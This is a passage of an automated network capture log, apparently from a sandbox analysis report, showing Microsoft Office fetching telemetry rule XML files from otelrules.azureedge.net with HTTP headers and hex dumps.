                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                                                                                            x-ms-request-id: 26ee9f20-901e-0048-4509-2cb800000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120254Z-16547b76f7f4k79zhC1DFWu9y00000000kh000000000fm6v
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            40192.168.2.44979713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:29 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                            x-ms-request-id: 09da145b-201e-0033-5108-32b167000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120229Z-16547b76f7fxsvjdhC1DFWprrs0000000kf000000000azgg
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDD0A87E5"
                                                                                                                                                                                                                                            x-ms-request-id: 2c5022f9-601e-0032-4ea7-34eebb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120254Z-1749fc9bdbdht5mthC1DFWph9000000002h0000000009vm1
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            41192.168.2.44979813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                            x-ms-request-id: 88f0aa43-e01e-0033-32a0-344695000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120230Z-1749fc9bdbdjznvchC1DFWx4dc000000027g00000000d55d
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDEC600CC"
                                                                                                                                                                                                                                            x-ms-request-id: acce4e73-801e-0048-50a3-34f3fb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120254Z-r178fb8d765mjvjchC1DFWhkyn00000002ag0000000087ar
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            42192.168.2.44979913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                            x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120230Z-16547b76f7fm7xw6hC1DFW5px40000000kn0000000000r6s
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:54 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDEA1B544"
                                                                                                                                                                                                                                            x-ms-request-id: bf4af877-b01e-003d-27f7-35d32c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120254Z-16547b76f7fdf69shC1DFWcpd00000000kgg000000008bak
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            43192.168.2.44980213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                            x-ms-request-id: 0b41d791-c01e-0079-140b-36e51a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120230Z-1749fc9bdbdpg69chC1DFWhecg00000002eg000000001kn9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule702901v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1411
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE53FACDA"
                                                                                                                                                                                                                                            x-ms-request-id: 655dae51-d01e-0066-56d2-2cea17000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-16547b76f7f9rdn9hC1DFWfk7s0000000khg00000000a0qn
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantT


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            44192.168.2.44980113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
